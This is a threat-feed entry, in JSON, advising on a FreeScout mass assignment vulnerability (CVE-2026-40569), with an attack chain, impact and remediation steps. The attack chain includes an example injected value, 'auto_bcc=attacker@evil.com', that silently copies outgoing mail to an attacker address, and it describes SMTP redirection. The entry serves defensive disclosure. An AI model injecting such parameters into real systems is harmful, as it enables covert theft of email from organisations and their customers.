{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/email-exfiltration/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"cvss":9,"id":"CVE-2026-40569"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["freescout","mass-assignment","vulnerability","email-exfiltration"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eFreeScout, a self-hosted help desk and shared mailbox platform, is vulnerable to a mass assignment flaw (CVE-2026-40569) in versions prior to 1.8.213. The vulnerability resides in the \u003ccode\u003econnectionIncomingSave()\u003c/code\u003e and \u003ccode\u003econnectionOutgoingSave()\u003c/code\u003e methods within \u003ccode\u003eapp/Http/Controllers/MailboxesController.php\u003c/code\u003e.  These methods lack proper input validation, allowing an authenticated administrator to overwrite critical mailbox settings by injecting arbitrary parameters into legitimate connection setting update requests. Attackers can modify fields like \u003ccode\u003eauto_bcc\u003c/code\u003e, \u003ccode\u003eout_server\u003c/code\u003e, \u003ccode\u003eout_password\u003c/code\u003e, \u003ccode\u003esignature\u003c/code\u003e, \u003ccode\u003eauto_reply_enabled\u003c/code\u003e, and \u003ccode\u003eauto_reply_message\u003c/code\u003e. This issue allows malicious actors to silently surveil communications, redirect SMTP traffic, inject malicious content, and persistently compromise email accounts. The impact is particularly severe in multi-admin environments or when an admin session is compromised through other means (e.g., XSS). FreeScout version 1.8.213 addresses this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains authenticated access to the FreeScout admin panel, either through legitimate credentials or by exploiting another vulnerability (e.g., XSS).\u003c/li\u003e\n\u003cli\u003eThe attacker navigates to the mailbox connection settings page.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a legitimate request to update connection settings, such as IMAP or SMTP server details.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious parameters into the request, such as \u003ccode\u003eauto_bcc=attacker@evil.com\u003c/code\u003e, which are not directly exposed in the connection settings form.\u003c/li\u003e\n\u003cli\u003eThe FreeScout application, due to the mass assignment vulnerability in \u003ccode\u003econnectionIncomingSave()\u003c/code\u003e or \u003ccode\u003econnectionOutgoingSave()\u003c/code\u003e, processes the injected parameters and updates the corresponding mailbox settings in the database.\u003c/li\u003e\n\u003cli\u003eWhen \u003ccode\u003eauto_bcc\u003c/code\u003e is set, every outgoing email from the compromised mailbox is silently BCC\u0026rsquo;d to the attacker-controlled email address via the \u003ccode\u003eSendReplyToCustomer\u003c/code\u003e job.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker could modify the \u003ccode\u003eout_server\u003c/code\u003e and \u003ccode\u003eout_password\u003c/code\u003e fields to redirect outgoing SMTP traffic through an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access to all outgoing email from the affected mailbox, enabling data exfiltration or further malicious activities like phishing.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to complete compromise of FreeScout mailboxes. An attacker could silently exfiltrate sensitive email communications, potentially impacting hundreds or thousands of users depending on the size of the organization. The injected parameters persist even after the initial attack, providing long-term access. This is especially dangerous in organizations that handle sensitive customer data or financial information. The ability to redirect SMTP traffic and inject malicious content further amplifies the risk, potentially leading to widespread phishing campaigns and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade FreeScout to version 1.8.213 or later to patch CVE-2026-40569 immediately.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation and sanitization for all user-supplied data, particularly in the \u003ccode\u003econnectionIncomingSave()\u003c/code\u003e and \u003ccode\u003econnectionOutgoingSave()\u003c/code\u003e methods, to prevent mass assignment vulnerabilities.\u003c/li\u003e\n\u003cli\u003eReview existing FreeScout installations for any unauthorized modifications to mailbox settings, specifically focusing on \u003ccode\u003eauto_bcc\u003c/code\u003e, \u003ccode\u003eout_server\u003c/code\u003e, \u003ccode\u003eout_password\u003c/code\u003e, \u003ccode\u003esignature\u003c/code\u003e, \u003ccode\u003eauto_reply_enabled\u003c/code\u003e, and \u003ccode\u003eauto_reply_message\u003c/code\u003e fields (requires direct database inspection).\u003c/li\u003e\n\u003cli\u003eMonitor FreeScout webserver logs for POST requests to \u003ccode\u003e/mailboxes/*/connection/incoming-save\u003c/code\u003e and \u003ccode\u003e/mailboxes/*/connection/outgoing-save\u003c/code\u003e endpoints containing unexpected parameters to detect potential exploitation attempts (see example Sigma rule below).\u003c/li\u003e\n\u003cli\u003eEnable webserver logging and ensure that POST request bodies are captured to facilitate investigation and detection.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-22T12:00:00Z","date_published":"2026-04-22T12:00:00Z","id":"/briefs/2026-04-freescout-mass-assignment/","summary":"FreeScout versions prior to 1.8.213 contain a mass assignment vulnerability allowing authenticated admins to modify sensitive mailbox settings by injecting parameters into connection settings requests, leading to email exfiltration and account compromise.","title":"FreeScout Mass Assignment Vulnerability (CVE-2026-40569)","url":"https://feed.craftedsignal.io/briefs/2026-04-freescout-mass-assignment/"}],"language":"en","title":"CraftedSignal Threat Feed — Email-Exfiltration","version":"https://jsonfeed.org/version/1.1"}